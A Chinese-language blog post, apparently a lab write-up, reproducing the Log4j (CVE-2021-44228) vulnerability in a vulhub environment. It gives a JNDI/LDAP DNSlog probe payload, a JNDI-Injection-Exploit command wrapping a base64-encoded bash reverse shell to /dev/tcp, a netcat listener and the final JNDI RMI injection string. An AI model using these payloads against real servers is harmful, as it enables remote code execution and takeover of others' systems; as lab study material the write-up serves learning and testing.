利用vulhub进行log4j复现

log4j(CVE-2021-44228)

简单测试

先利用DNSlog测试是否存在该漏洞:

传入payload:
url/admin/cores?action=${jndi:ldap://(获取到的dns域名)/exp}

回到dnslog查看是否有解析记录

image-20220514111145554

证明漏洞存在!

漏洞复现

工具地址:

 https://github.com/welk1n/JNDI-Injection-Exploit

第一步:搭建JNDI-Injection-Exploit

在JNDI-Injection-Exploit目录下执行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]

比如:

bash -i >& /dev/tcp/127.0.0.1/6666 0>&1 ---> YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNjY2NiAwPiYx

image-20220514113637662

第二步:打开监听

另起终端,打开nc -lvp 端口 进行监听

image-20220514114007202

第三步:Attack

用最下面这个payload

image-20220514114118017

传入payload:

url/admin/cores?action=${jndi:(直接粘贴rmi)}

成功反弹:

image-20220514165231770

posted @ 2022-06-17 11:23  森sen  阅读(412)  评论(0编辑  收藏  举报